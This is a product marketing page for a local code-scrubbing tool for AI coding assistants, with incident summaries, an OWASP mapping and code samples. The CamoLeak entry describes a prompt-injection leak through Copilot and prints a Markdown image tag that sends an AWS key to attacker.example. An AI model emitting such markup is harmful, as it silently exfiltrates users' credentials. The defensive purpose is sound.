Active threat landscape: updated April 2026

The AI Coding Security Crisis Is Real

Real incidents, real fines, real data. This is what happens when engineering teams adopt AI coding tools without protection.

29M secrets on GitHub in 2025 · 6.4% of Copilot repos leak secrets · Samsung banned ChatGPT after 3 leaks in 20 days · 73% of enterprise AI implementations terminated by security

Documented Incidents

Each incident below describes what happened and how Pretense would have prevented it.

CRITICAL · March 2023

Samsung: Proprietary Code via ChatGPT

Engineers at Samsung Semiconductor sent proprietary source code, meeting notes, and hardware specs to ChatGPT for debugging help.

CVSS Critical · February 2026

Moltbook: 1.5M API Keys in Vibe-Coded App

A vibe-coded app built using AI assistants committed 1.5 million third-party API keys to a public repository. The AI-generated code lacked secrets hygiene.

CVSS 9.6 · August 2025

CamoLeak: AWS Keys via Copilot Invisible Markdown

CamoLeak (CVSS 9.6) demonstrated that GitHub Copilot could silently exfiltrate AWS credentials by embedding them in invisible Markdown image tags within AI-generated code suggestions.
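To make the vector concrete: an injected suggestion can embed a stolen value in the URL of an image that renders invisibly, so the credential leaves the machine the moment the Markdown is previewed. The host, query parameter, and key below are illustrative placeholders (the key is AWS's documented example access key), not the actual CamoLeak payload:

```markdown
<!-- Nothing visible renders, but fetching the image
     delivers the embedded credential to the attacker's server. -->
![](https://attacker.example/pixel.png?k=AKIAIOSFODNN7EXAMPLE)
```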

HIGH · 2024

GitHub Copilot Secret Leak Rate: 6.4%

CUHK research published at ACM FSE 2024 found that repositories using GitHub Copilot leak secrets at a 6.4% rate versus 4.6% for non-Copilot repos, roughly 40% higher in relative terms.

CRITICAL · March 2026

LiteLLM Supply Chain: All API Keys Stolen

LiteLLM, a popular LLM proxy with 41.8K GitHub stars, was compromised via a supply-chain attack. All API keys routed through it were exposed.

OWASP LLM Top 10 Coverage

The OWASP LLM Top 10 defines the canonical AI security risk taxonomy. Here is where Pretense stands today.

| OWASP ID | Risk | Coverage | Notes |
|---|---|---|---|
| LLM01 | Prompt Injection | Partial | Mutation renders exfiltrated data non-actionable. Attacker gets synthetic tokens, not real identifiers. |
| LLM02 | Sensitive Information Disclosure | Strong | 30+ secret patterns + Shannon entropy analysis. Secrets blocked; identifiers mutated. |
| LLM05 | Improper Output Handling | Roadmap | Phase 8: response scanner will sanitize AI output before applying to codebase. |
| LLM06 | Excessive Agency | Partial | Claude Code hooks (PreToolUse / PostToolUse) intercept file writes and tool calls. |
| LLM07 | System Prompt Leakage | Strong | No raw secrets or identifiers reach the system prompt. Mutation runs before any API call. |

Source: OWASP Top 10 for LLM Applications v1.1 (2025). Roadmap items tracked in the public changelog.
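For intuition on the entropy check cited under LLM02, here is a minimal sketch of Shannon-entropy scoring for candidate tokens. The prefix list, the 4.0 bits/character threshold, and the function names are illustrative assumptions, not Pretense internals:

```typescript
// Shannon entropy in bits per character: H = -Σ p(c) · log2 p(c).
// Random API keys score high; ordinary identifiers score low.
function shannonEntropy(s: string): number {
  const counts = new Map<string, number>();
  for (const ch of s) counts.set(ch, (counts.get(ch) ?? 0) + 1);
  let h = 0;
  for (const n of counts.values()) {
    const p = n / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Flag a token if it matches a known secret prefix OR looks random enough.
const SECRET_PREFIXES = /^(AKIA|sk-|ghp_|xoxb-)/; // illustrative subset
function looksLikeSecret(token: string): boolean {
  return SECRET_PREFIXES.test(token) ||
    (token.length >= 20 && shannonEntropy(token) > 4.0);
}
```

Pattern matching catches known key formats even when their entropy is modest; the entropy fallback catches unknown formats, at the cost of occasional false positives on long random-looking identifiers.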

Organizations That Banned AI Coding Tools

81% of developers have security concerns about AI agents. 26% have been blocked by IT/InfoSec from using AI tools at work.

Samsung

Source code + meeting data leaked via ChatGPT (2023)

Apple

Internal data security: no public AI tool approval process

JPMorgan Chase

Regulatory compliance: SEC AI guidance

Goldman Sachs

Client data confidentiality requirements

Wells Fargo

OCC/Federal Reserve AI governance requirements

Deutsche Bank

BaFin AI governance + GDPR controls

Northrop Grumman

ITAR/EAR export control restrictions

US Congress

Capitol classified network security policy

The problem: Banning tools costs more than protecting them. A developer who loses access to AI coding tools loses 30–55% productivity (GitHub/McKinsey 2024). Pretense lets security teams say yes instead of no.

Compliance Requirements

Regulations written before AI coding tools existed now govern how you use them. The gaps are not theoretical. They are audit findings.

HIPAA

§164.312 - Technical Safeguards

Standard AI SaaS accounts have no Business Associate Agreement (BAA). Sending any code referencing PHI (patient IDs, diagnosis codes, FHIR paths) to such a service is an automatic HIPAA violation.

Consequence

OCR fines up to $1.9M per violation category. Healthcare devs effectively blocked from AI tools.

GDPR

Art. 44 - Third Country Transfers

Italy's data protection authority fined OpenAI €15M in December 2024. EU developers sending code with personal data identifiers to US-hosted APIs risk similar enforcement.

Consequence

4% of global annual revenue or €20M, whichever is higher. US API endpoints = non-adequate third country.

PCI-DSS v4

Full enforcement April 2025

PCI-DSS v4 Requirement 6.3.3 mandates that all software components are reviewed for security. Payment function names and variable identifiers sent to external AI = automatic audit finding.

Consequence

Loss of card processing ability. Fines of $5K–$100K/month from card brands. QSA audit failure.

SOC2 CC6.7

Logical Access Controls

Auditors now explicitly ask: 'What controls govern employee use of AI coding tools?' Most engineering teams have no documented answer, no controls, and no audit trail.

Consequence

SOC2 Type II failure. Loss of enterprise contracts that require SOC2 attestation.

Pretense vs The Problem

Same developer workflow. Same AI response quality. Zero proprietary identifiers leave your machine.

Without Pretense: raw prompt
// Your code - sent to Anthropic as-is
async function getUserToken(userId: string) {
  const ANTHROPIC_API_KEY = process.env.ANTHROPIC_API_KEY;
  const user = await processPaymentData(userId);
  return generateAuthToken(user, ANTHROPIC_API_KEY);
}
With Pretense: protected prompt
// What Anthropic actually receives
async function _fn4a2b(_v9c1e: string) {
  // [BLOCKED] credential removed by Pretense
  const _v3d7f = await _fn8c3d(_v9c1e);
  return _fn2a4b(_v3d7f);
}
// Restored response is byte-identical to original
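The byte-identical restore works because mutation is a reversible substitution: the same map that rewrites identifiers on the way out is inverted on the way back. A simplified sketch, assuming a regex-based whole-word substitution (Pretense's actual implementation is presumably AST-aware; the map contents and helper names here are illustrative):

```typescript
// Forward map: real identifiers → synthetic tokens.
const forward = new Map<string, string>([
  ["getUserToken", "_fn4a2b"],
  ["userId", "_v9c1e"],
]);

// Apply each mapping on whole-word boundaries only.
function substitute(src: string, map: Map<string, string>): string {
  let out = src;
  for (const [from, to] of map) {
    out = out.replace(new RegExp(`\\b${from}\\b`, "g"), to);
  }
  return out;
}

// Invert the map to restore the AI's response verbatim.
function invert(map: Map<string, string>): Map<string, string> {
  return new Map([...map].map(([k, v]) => [v, k]));
}

const original = "async function getUserToken(userId: string) { return userId; }";
const mutated = substitute(original, forward);
const restored = substitute(mutated, invert(forward));
// restored is byte-identical to original
```

The word-boundary anchors keep `userId` from matching inside longer identifiers; a production rewriter would also need to guarantee synthetic tokens never collide with names already in the source.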
0 secrets leaked · Credentials blocked before any API call
100% response fidelity · Byte-exact round-trip: no context loss
12ms avg scan time · Local-only: no cloud latency added
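For the Claude Code interception noted under LLM06 in the OWASP table, the wiring could look like the following `.claude/settings.json` fragment. The `pretense scan --stdin` subcommand shown is an assumption for illustration, not a documented CLI flag:

```json
{
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "Write|Edit|Bash",
        "hooks": [
          { "type": "command", "command": "pretense scan --stdin" }
        ]
      }
    ]
  }
}
```

A command hook that exits non-zero can block the tool call, which is what lets a scanner veto a file write before any content leaves the machine.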

Protect your team's code today

30-second deploy. Local-first. The same protection Samsung needed before 2023. Available now, free, in your terminal.

$ npm install -g pretense && pretense init

No telemetry · No cloud dependency · Local-first architecture
